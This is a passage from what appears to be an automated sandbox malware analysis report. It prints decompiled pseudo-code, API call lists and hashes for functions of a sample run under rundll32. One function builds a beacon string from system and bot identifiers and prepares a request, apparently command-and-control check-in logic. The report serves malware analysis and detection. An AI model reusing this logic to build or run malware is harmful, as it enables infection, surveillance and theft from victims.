                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 90971c1f82fb7dcc136a0fe0890e268b914e7bc22ea4228df6852471704be344
                                          • Instruction ID: a1394439044bf433624350bcd7934cd9f02245e537602199b613ead33b43d51c
                                          • Opcode Fuzzy Hash: 90971c1f82fb7dcc136a0fe0890e268b914e7bc22ea4228df6852471704be344
                                          • Instruction Fuzzy Hash: 8DF05426600149BBE711DABD8D00EAF7ABDDBC5650F6100D9AA1CD3240EE74EF0996B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF7BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E04BF7BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4bfd2a4; // 0x24da5a8
				_t4 = _t15 + 0x4bfe39c; // 0x70d8944
				_t20 = _t4;
				_t6 = _t15 + 0x4bfe124; // 0x650047
				_t17 = E04BF642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04BF4CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x04bf7bb3
                                          0x04bf7bba
                                          0x04bf7bbb
                                          0x04bf7bbc
                                          0x04bf7bbd
                                          0x04bf7bc3
                                          0x04bf7bc8
                                          0x04bf7bc8
                                          0x04bf7bd2
                                          0x04bf7be4
                                          0x04bf7beb
                                          0x04bf7c19
                                          0x04bf7bed
                                          0x04bf7bef
                                          0x04bf7bf4
                                          0x04bf7c16
                                          0x04bf7bf6
                                          0x04bf7bf9
                                          0x04bf7c00
                                          0x04bf7c05
                                          0x04bf7c07
                                          0x04bf7c07
                                          0x04bf7c0c
                                          0x04bf7c0c
                                          0x04bf7bf4
                                          0x04bf7c20

                                          APIs
                                            • Part of subcall function 04BF642C: SysFreeString.OLEAUT32(?), ref: 04BF650B
                                            • Part of subcall function 04BF4CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04BF358E,004F0053,00000000,?), ref: 04BF4CDC
                                            • Part of subcall function 04BF4CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04BF358E,004F0053,00000000,?), ref: 04BF4D06
                                            • Part of subcall function 04BF4CD3: memset.NTDLL ref: 04BF4D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF7C0C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 3d173aed016d5d87aa4115a7b1f90fb70ef92907ab3122f53b619eefb4c65608
                                          • Instruction ID: 014a715a969b74ca80832529da89305aa1a2bc2dc89a3475304a582cada03586
                                          • Opcode Fuzzy Hash: 3d173aed016d5d87aa4115a7b1f90fb70ef92907ab3122f53b619eefb4c65608
                                          • Instruction Fuzzy Hash: B801713150011ABFDB119FA8CD049ABBBB9FB04254F0145A5EA09E7161F7B1E96AC7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF58BE, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF58BE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4bfd238, 0, _a4); // executed
				return _t2;
			}




                                          0x04bf58ca
                                          0x04bf58d0

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: b45e5fce67b0cd3ebe6dbfba7741f391f495206c8f72cbe60950d842800ecc63
                                          • Instruction ID: 89ec3acc51042e13d6b26bbbc9a25097c1598c4c0f2a570ede81dcff465f1578
                                          • Opcode Fuzzy Hash: b45e5fce67b0cd3ebe6dbfba7741f391f495206c8f72cbe60950d842800ecc63
                                          • Instruction Fuzzy Hash: 5FB01231040100FBDE014B60DD08F05FF31FF50700F018012B2090507083364C71EB35
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF9347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E04BF9347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x4bfd330;
				E04BF684E();
				while(1) {
					_t8 = E04BF32BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E04BFA5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x4bfd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E04BF684E();
					if(_t19 != 0) {
						_t22 =  *0x4bfd338; // 0x70d9b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x04bf934f
                                          0x04bf9353
                                          0x04bf9354
                                          0x04bf9355
                                          0x04bf935a
                                          0x04bf935f
                                          0x04bf9366
                                          0x04bf936d
                                          0x00000000
                                          0x00000000
                                          0x04bf936f
                                          0x04bf9374
                                          0x04bf9375
                                          0x04bf937c
                                          0x04bf9396
                                          0x00000000
                                          0x04bf937e
                                          0x04bf937e
                                          0x04bf9380
                                          0x04bf9383
                                          0x04bf9387
                                          0x00000000
                                          0x00000000
                                          0x04bf9389
                                          0x04bf9387
                                          0x04bf939e
                                          0x04bf939e
                                          0x04bf93a0
                                          0x04bf93a7
                                          0x04bf93a9
                                          0x04bf93af
                                          0x04bf93b6
                                          0x04bf93c6
                                          0x04bf93be
                                          0x04bf93c1
                                          0x04bf93c1
                                          0x04bf93c9
                                          0x04bf93c9
                                          0x04bf93d2
                                          0x04bf93d2
                                          0x04bf939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04BF684E: GetProcAddress.KERNEL32(36776F57,04BF935F), ref: 04BF6869
                                            • Part of subcall function 04BF32BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04BF32E5
                                            • Part of subcall function 04BF32BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04BF3307
                                            • Part of subcall function 04BF32BA: memset.NTDLL ref: 04BF3321
                                            • Part of subcall function 04BF32BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04BF335F
                                            • Part of subcall function 04BF32BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04BF3373
                                            • Part of subcall function 04BF32BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 04BF338A
                                            • Part of subcall function 04BF32BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04BF3396
                                            • Part of subcall function 04BF32BA: lstrcat.KERNEL32(?,642E2A5C), ref: 04BF33D7
                                            • Part of subcall function 04BF32BA: FindFirstFileA.KERNEL32(?,?), ref: 04BF33ED
                                            • Part of subcall function 04BFA5E9: lstrlen.KERNEL32(?,00000000,04BFD330,00000001,04BF937A,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?), ref: 04BFA5F2
                                            • Part of subcall function 04BFA5E9: mbstowcs.NTDLL ref: 04BFA619
                                            • Part of subcall function 04BFA5E9: memset.NTDLL ref: 04BFA62B
                                          • HeapFree.KERNEL32(00000000,04BFD00C,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?,04BFD00C,?,?), ref: 04BF9396
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 5379a830b17e92a9aa126e354a57ef0cc0ab278bc87730e969af8c389792d269
                                          • Instruction ID: 0e0ee0a330e51ac05b1dc4406686648164e359781a4feb1d2a93b5b7434b9354
                                          • Opcode Fuzzy Hash: 5379a830b17e92a9aa126e354a57ef0cc0ab278bc87730e969af8c389792d269
                                          • Instruction Fuzzy Hash: FA014CB6200205AAFB105FE6CD80B7AB6E9EB44364F4010BAFB4DC70E0D664FC8E5360
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF1B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF1B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E04BF7BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E04BF74B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x4bfd238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x04bf1b1b
                                          0x04bf1b72
                                          0x04bf1b77
                                          0x04bf1b1d
                                          0x04bf1b37
                                          0x04bf1b3b
                                          0x04bf1b40
                                          0x04bf1b42
                                          0x04bf1b54
                                          0x04bf1b60
                                          0x04bf1b44
                                          0x04bf1b44
                                          0x04bf1b49
                                          0x04bf1b4e
                                          0x04bf1b4e
                                          0x04bf1b42
                                          0x04bf1b3b
                                          0x04bf1b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04BF690C,?,004F0053,070D9388,00000000,?), ref: 04BF1B60
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: cb05a8638410f94401d55ee38561c84d1fa5e113602764fd71486390bf38c136
                                          • Instruction ID: 754527fde19a5273899c5bdd14b6bb9fdfc6f8268551b53d2c2afe34bc6afd8c
                                          • Opcode Fuzzy Hash: cb05a8638410f94401d55ee38561c84d1fa5e113602764fd71486390bf38c136
                                          • Instruction Fuzzy Hash: D501623210020AFBDB219F99DC01FAA7B69FF04360F048499FB1D9A161E731AD24D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BFA872, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E04BFA872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                          0x04bfa872
                                          0x04bfa87f
                                          0x04bfa880
                                          0x04bfa881
                                          0x04bfa888
                                          0x04bfa8b6
                                          0x04bfa8b7
                                          0x04bfa8ba
                                          0x04bfa8c0
                                          0x00000000
                                          0x00000000
                                          0x04bfa89f
                                          0x04bfa8a9
                                          0x04bfa8b0
                                          0x00000000
                                          0x04bfa8a1
                                          0x04bfa8a4
                                          0x04bfa8c4
                                          0x04bfa8a6
                                          0x04bfa8a6
                                          0x00000000
                                          0x04bfa8a6
                                          0x04bfa8a4
                                          0x04bfa8cb
                                          0x04bfa8d1
                                          0x04bfa8d1
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: b686af9171442f9d44b44b32dc35f31b5619975881258f47f75cd15530eb09e4
                                          • Instruction ID: 4f279d6327de493211381395a73dd3db793196e15ff7dd8be76967b29079ab03
                                          • Opcode Fuzzy Hash: b686af9171442f9d44b44b32dc35f31b5619975881258f47f75cd15530eb09e4
                                          • Instruction Fuzzy Hash: 7BF03C75D01218EFDB04DB94C888AEDB7B8EF08304F5080EAE60AA3140D3B46B89CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF60CF, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF60CF(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E04BF7A28(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E04BF147E(_a4);
				}
				return _t13;
			}





                                          0x04bf60db
                                          0x04bf60e0
                                          0x04bf60e4
                                          0x04bf60eb
                                          0x04bf60f6
                                          0x04bf60fa
                                          0x04bf60fa
                                          0x04bf6103

                                          APIs
                                            • Part of subcall function 04BF7A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04BF7A5E
                                            • Part of subcall function 04BF7A28: memset.NTDLL ref: 04BF7AD3
                                            • Part of subcall function 04BF7A28: memset.NTDLL ref: 04BF7AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04BF9F9F,?,?,04BF9C62,00000002,?,?,?), ref: 04BF60EB
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: 8222f0ca3e8d617cc4ea93e8729b161231327160d9995204d1106052ef4bb4f6
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 85E08C76500129BBDB222AA8DC40DEF7F5CDF62691F0040A0FF0C9A205DA25EA24A7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 04BF514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E04BF514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x4bfd018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0x4bfd014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x4bfd010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x4bfd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x4bfd2a4; // 0x24da5a8
				_t3 = _t31 + 0x4bfe633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x4bfd02c,  *0x4bfd004, _t26);
				_t34 = E04BF57AB();
				_t35 =  *0x4bfd2a4; // 0x24da5a8
				_t4 = _t35 + 0x4bfe673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E04BF73E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x4bfd2a4; // 0x24da5a8
					_t6 = _t86 + 0x4bfe8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x4bfd238, 0, _t99);
				}
				_t100 = E04BF614A();
				if(_t100 != 0) {
					_t81 =  *0x4bfd2a4; // 0x24da5a8
					_t8 = _t81 + 0x4bfe8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x4bfd238, 0, _t100);
				}
				_t101 =  *0x4bfd324; // 0x70d95b0
				_a32 = E04BF757B(0x4bfd00a, _t101 + 4);
				_t43 =  *0x4bfd2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x4bfd2a4; // 0x24da5a8
					_t11 = _t77 + 0x4bfe8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x4bfd2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x4bfd2a4; // 0x24da5a8
					_t13 = _t74 + 0x4bfe8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x4bfd238, 0, 0x800);
					if(_t103 != 0) {
						E04BF749F(GetTickCount());
						_t51 =  *0x4bfd324; // 0x70d95b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x4bfd324; // 0x70d95b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x4bfd324; // 0x70d95b0
						_t106 = E04BF4D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x4bfc294);
							_t63 =  *0x4bfd2a4; // 0x24da5a8
							_push(_t106);
							_t15 = _t63 + 0x4bfe252; // 0x616d692f
							_t65 = E04BF9DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E04BF666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E04BF6106();
								}
								HeapFree( *0x4bfd238, 0, _v48);
							}
							HeapFree( *0x4bfd238, 0, _t106);
						}
						HeapFree( *0x4bfd238, 0, _t103);
					}
					HeapFree( *0x4bfd238, 0, _a24);
				}
				HeapFree( *0x4bfd238, 0, _t108);
				return _a12;
			}

















































                                          0x04bf514f
                                          0x04bf514f
                                          0x04bf514f
                                          0x04bf5154
                                          0x04bf515a
                                          0x04bf5164
                                          0x04bf5166
                                          0x04bf5166
                                          0x04bf5173
                                          0x04bf517e
                                          0x04bf5181
                                          0x04bf518c
                                          0x04bf518f
                                          0x04bf5194
                                          0x04bf5197
                                          0x04bf519c
                                          0x04bf519f
                                          0x04bf51ab
                                          0x04bf51b8
                                          0x04bf51ba
                                          0x04bf51c0
                                          0x04bf51c5
                                          0x04bf51d0
                                          0x04bf51d2
                                          0x04bf51d5
                                          0x04bf51dc
                                          0x04bf51e0
                                          0x04bf51e2
                                          0x04bf51e7
                                          0x04bf51f3
                                          0x04bf51f5
                                          0x04bf5201
                                          0x04bf5203
                                          0x04bf5203
                                          0x04bf520e
                                          0x04bf5212
                                          0x04bf5214
                                          0x04bf5219
                                          0x04bf5225
                                          0x04bf5227
                                          0x04bf5233
                                          0x04bf5235
                                          0x04bf5235
                                          0x04bf523b
                                          0x04bf524e
                                          0x04bf5252
                                          0x04bf5259
                                          0x04bf525c
                                          0x04bf5261
                                          0x04bf526c
                                          0x04bf526e
                                          0x04bf5271
                                          0x04bf5271
                                          0x04bf5273
                                          0x04bf527a
                                          0x04bf527d
                                          0x04bf5282
                                          0x04bf528c
                                          0x04bf528e
                                          0x04bf5296
                                          0x04bf52af
                                          0x04bf52b3
                                          0x04bf52bf
                                          0x04bf52c4
                                          0x04bf52cd
                                          0x04bf52de
                                          0x04bf52e2
                                          0x04bf52eb
                                          0x04bf52f1
                                          0x04bf52fe
                                          0x04bf530b
                                          0x04bf5311
                                          0x04bf531d
                                          0x04bf5323
                                          0x04bf5328
                                          0x04bf5329
                                          0x04bf5330
                                          0x04bf5335
                                          0x04bf533b
                                          0x04bf5341
                                          0x04bf5348
                                          0x04bf534f
                                          0x04bf5355
                                          0x04bf535c
                                          0x04bf5360
                                          0x04bf536b
                                          0x04bf5370
                                          0x04bf5376
                                          0x04bf537f
                                          0x04bf537f
                                          0x04bf5390
                                          0x04bf5390
                                          0x04bf539f
                                          0x04bf539f
                                          0x04bf53ae
                                          0x04bf53ae
                                          0x04bf53c0
                                          0x04bf53c0
                                          0x04bf53cf
                                          0x04bf53e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04BF5166
                                          • wsprintfA.USER32 ref: 04BF51B3
                                          • wsprintfA.USER32 ref: 04BF51D0
                                          • wsprintfA.USER32 ref: 04BF51F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF5203
                                          • wsprintfA.USER32 ref: 04BF5225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF5235
                                          • wsprintfA.USER32 ref: 04BF526C
                                          • wsprintfA.USER32 ref: 04BF528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BF52A9
                                          • GetTickCount.KERNEL32 ref: 04BF52B9
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF52CD
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF52EB
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?,070D95B0), ref: 04BF4D57
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D5F
                                            • Part of subcall function 04BF4D2C: strcpy.NTDLL ref: 04BF4D76
                                            • Part of subcall function 04BF4D2C: lstrcat.KERNEL32(00000000,?), ref: 04BF4D81
                                            • Part of subcall function 04BF4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D9E
                                          • StrTrimA.SHLWAPI(00000000,04BFC294,?,070D95B0), ref: 04BF531D
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?,00000000,00000000,04BF5335,616D692F,00000000), ref: 04BF9DFB
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?), ref: 04BF9E03
                                            • Part of subcall function 04BF9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04BF9E1A
                                            • Part of subcall function 04BF9DEF: lstrcat.KERNEL32(00000000,?), ref: 04BF9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04BF5348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 04BF535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04BF5360
                                            • Part of subcall function 04BF666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04BF6720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04BF5390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04BF539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,070D95B0), ref: 04BF53AE
